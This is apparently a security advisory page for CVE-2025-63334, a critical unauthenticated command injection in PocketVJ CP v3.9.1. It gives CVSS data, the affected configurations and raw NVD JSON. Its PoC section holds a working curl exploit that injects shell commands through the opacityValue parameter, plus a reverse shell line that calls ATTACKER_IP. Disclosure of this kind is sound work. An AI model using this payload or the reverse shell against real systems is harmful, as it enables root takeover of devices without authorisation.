Security Vulnerability Report
中文
CVE-2025-63334 CVSS 9.8 CRITICAL

CVE-2025-63334

Published: 2025-11-05 20:15:37
Last Modified: 2026-01-09 17:49:52

Description

PocketVJ CP PocketVJ-CP-v3 pvj version 3.9.1 contains an unauthenticated remote code execution vulnerability in the submit_opacity.php component. The application fails to sanitize user input in the opacityValue POST parameter before passing it to a shell command, allowing remote attackers to execute arbitrary commands with root privileges on the underlying system.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:magdesign:pocketvj_control_panel_firmware:3.9.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magdesign:pocketvj_control_panel:-:*:*:*:*:*:*:* - NOT VULNERABLE
PocketVJ CP v3.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-63334 PoC - PocketVJ CP v3.9.1 Remote Code Execution # Target: PocketVJ CP submit_opacity.php TARGET="http://target.com" # Replace with actual target URL CMD="id" # Command to execute curl -X POST "${TARGET}/submit_opacity.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "opacityValue=;${CMD};#" \ -k # Ignore SSL certificate errors if any echo "[+] Exploit sent. Check response for command output." echo "[+] To get a reverse shell, use: bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63334", "sourceIdentifier": "[email protected]", "published": "2025-11-05T20:15:36.507", "lastModified": "2026-01-09T17:49:51.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PocketVJ CP PocketVJ-CP-v3 pvj version 3.9.1 contains an unauthenticated remote code execution vulnerability in the submit_opacity.php component. The application fails to sanitize user input in the opacityValue POST parameter before passing it to a shell command, allowing remote attackers to execute arbitrary commands with root privileges on the underlying system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magdesign:pocketvj_control_panel_firmware:3.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "302FF9B0-2BEB-48F6-A560-C6A75F0FE4F2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magdesign:pocketvj_control_panel:-:*:*:*:*:*:*:*", "matchCriteriaId": "AE29A266-9964-4BFD-9D48-8B95D94DAC1F"}]}]}], "references": [{"url": "https://gist.github.com/mamdouhalrekabi-ops/e7686a0bdd197c77c1b54191e1a2880f", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/magdesign/PocketVJ-CP-v3/releases/tag/release", "source": "[email protected]", "tags": ["Release Notes"]}]}}